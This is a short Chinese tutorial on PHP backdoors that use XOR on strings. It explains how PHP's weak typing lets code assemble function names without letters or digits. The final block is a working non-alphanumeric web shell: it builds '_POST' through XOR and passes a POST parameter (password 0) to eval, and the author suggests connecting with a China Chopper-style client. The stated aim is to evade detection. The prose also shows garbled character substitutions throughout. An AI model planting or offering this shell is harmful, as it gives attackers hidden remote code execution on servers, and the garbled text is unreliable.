php後門－－異或

   看這個：

<?php  

echo "A"^"}";

?>

   運行這段代碼，那麼輸出的結果是字符"<",之因此會獲得這樣的結果，是由於代碼中對字符"A"和字符"}"進行了異或操做。在PHP中，兩個變量進行異或時，會將字符串轉換成二進制再進行異或，異或完，又將結果從二進制轉換成了字符串。異或操做有時也被用來交換兩個變量的值。

   咱們都知道，PHP是弱類型的語言，也就是說在PHP中咱們能夠不預先聲明變量的類型，而直接聲明一個變量並進行初始化或賦值操做。正是因爲PHP弱類型的這個特色，咱們對PHP的變類型進行隱式的轉換，並利用這個特色進行一些很是規的操做。如將整型轉換成字符串型，將布爾型看成整型，或者將字符串看成函數來處理，下面咱們來看一段代碼：

<?php  

$_++;  

$__="<"^"}";  

$__("stuff");

?>

看到這段代碼，你們或許會以爲很疑惑，下面我簡單的來解釋一下：

 (1)$_++;這行代碼的意思是對變量名爲"_"的變量進行自增操做，在PHP中未定義的變量默認值爲null,null==false==0,咱們能夠在不使用任何數字的狀況下,經過對未定義變量的自增操做來獲得一個數字。

 (2)$__="<"^"}";對字符"<"和"}"進行異或運算，獲得結果A賦給變量名爲"__"(兩個下劃線)的變量

 (3)$__("stuff");經過上面的賦值操做,變量$__的值爲A，因此這行能夠看做是A("stuff"),在PHP中,這行代碼表示調用函數A,可是因爲程序中並未定義函數A，因此這行代碼會拋出一個致命錯誤使程序中止運行。這行代碼沒什麼實際的意義，可是它能簡單體現出在PHP中，咱們能夠將字符串看成函數來處理。

 文章進行到這裏，你們若是再看到相似的PHP後門應該不會那麼迷惑了，你能夠經過一句句的分析後門代碼來理解後門想實現的功能。若是你依然迷惑，那說明本菜鳥的文章寫的很差，先說聲抱歉了，可是仍是但願你別罵我。

 上面的那段示例代碼最後會出錯，致使程序中止運行，固然寫出一個出錯的程序並非咱們的目的，使用這種後門的主要目的是建立一些能夠繞過檢測的而且對咱們有用的字符串，如_POST", "system", "call_user_func_array"，或者是任何咱們須要的東西。

 下面是個很是簡單的非數字字母的PHP後門：

@$_++; // $_ = 1
$__=("#"^"|"); // $__ = _
$__.=("."^"~"); // _P
$__.=("/"^"`"); // _PO
$__.=("|"^"/"); // _POS
$__.=("{"^"/"); // _POST
@eval(${$__}[!$_]);//mima:0

   上菜刀把。